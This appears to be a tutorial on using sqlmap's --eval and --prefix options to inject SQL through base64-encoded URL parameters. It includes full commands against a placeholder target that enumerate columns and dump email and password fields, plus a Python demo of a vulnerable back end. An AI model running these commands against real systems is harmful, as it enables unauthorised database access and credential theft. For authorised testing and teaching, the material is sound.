sqlmap advanced tips and tricks
Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters.
For example, we have something like:
http://<target>/products/article.php?art_id=<base64_encoded_value>
In this case we have to “convince” sqlmap to base64-encode every payload it sends, so that the application decodes it back to the SQL we actually want injected. Luckily, sqlmap has an option that lets you run your own Python code against the request parameters before each request goes out:
--eval=EVALCODE Evaluate provided Python code before the request
In Python 3 (which current sqlmap runs on), base64.b64encode() takes bytes and returns bytes, so to encode a string and get a string back you need something like:
import base64
# encode the str to bytes, base64 it, then turn the result back into a str
print(base64.b64encode('MY_STRING'.encode()).decode())
Tip: Check first whether you also need a prefix (something like ' or "). If the decoded value lands inside a quoted string literal in the SQL query, the payload has to close that quote, otherwise every injected payload is just treated as part of the string; pass the quote with --prefix. sqlmap also ships a base64encode tamper script, but a tamper script encodes only the injected payload, whereas --eval lets you re-encode the complete parameter value (original value plus payload), which is what the back end expects to decode.
Once you get the database name,
In the end, the command will look something like this. The URL carries the plain, not yet encoded, value of art_id, because --eval runs for every request sqlmap sends, including the very first baseline one, and encodes whatever the parameter holds at that moment:
sqlmap -u "http://<target>/products/article.php?art_id=<decoded_value>" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' "
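To see what the --eval line actually does to the parameter, and why the prefix from the Tip matters, here is a small added Python 3 example (it is not sqlmap code and not from the original post). It assumes a hypothetical back end that base64-decodes art_id and concatenates it into a quoted string literal; the sample value 42, the query text and the -- - suffix are constructed for the example.

```python
import base64
from urllib.parse import quote, unquote

# Constructed sample values: the real target's art_id and query are unknown.
SAMPLE_ART_ID = "42"
PREFIX = "' "      # the --prefix="' " from the command above
SUFFIX = "-- -"    # an assumed comment suffix; sqlmap normally picks one itself


def encode_param(value: str) -> str:
    """Exactly what the --eval snippet does to art_id under Python 3:
    b64encode() wants bytes, and sqlmap wants a str back in the variable."""
    return base64.b64encode(value.encode()).decode()


def decode_param(value: str) -> str:
    """The inverse, i.e. what the back end does to the parameter it receives."""
    return base64.b64decode(value.encode()).decode()


def request_value(original: str, payload: str, prefix: str = "", suffix: str = "") -> str:
    """Build the parameter the way sqlmap does (original value, then boundary
    prefix, payload and suffix) and encode it as --eval would. Returned
    URL-encoded, because base64 output contains '+', '/' and '='."""
    return quote(encode_param(f"{original}{prefix}{payload}{suffix}"))


def backend_query(art_id_param: str) -> str:
    """Hypothetical vulnerable back end: decodes art_id and concatenates it
    straight into a quoted string literal (the situation the Tip is about)."""
    decoded = decode_param(unquote(art_id_param))
    return f"SELECT title, body FROM articles WHERE art_id = '{decoded}'"


def with_prefix() -> str:
    """Payload sent with --prefix="' ": the quote is closed, the condition
    becomes live SQL and the suffix comments out the trailing quote."""
    return backend_query(request_value(SAMPLE_ART_ID, "AND 1=1", PREFIX, SUFFIX))


def without_prefix() -> str:
    """Same payload with no prefix: it never leaves the string literal."""
    return backend_query(request_value(SAMPLE_ART_ID, " AND 1=1"))


if __name__ == "__main__":
    print("encoded parameter:", request_value(SAMPLE_ART_ID, "AND 1=1", PREFIX, SUFFIX))
    print("with prefix:   ", with_prefix())
    print("without prefix:", without_prefix())
```

Run it and compare the two queries: the first one is a real boolean condition the database evaluates, the second is a harmless string comparison, which is exactly the difference --prefix="' " makes once the payload is hidden inside base64.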
Once you have a list of tables and, let’s say, you only want to retrieve the columns of the my_users table, add the -D and -T parameters together with --columns:
sqlmap -u "http://<target>/products/article.php?art_id=<decoded_value>" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' " -D my_db -T my_users --columns
If you only want to dump specific fields, use the -C option together with --dump:
sqlmap -u "http://<target>/products/article.php?art_id=<decoded_value>" -p art_id --eval "import base64; art_id = base64.b64encode(art_id.encode()).decode()" -v 3 --prefix="' " -D my_db -T my_users -C my_email,my_password --dump
Hope this helps!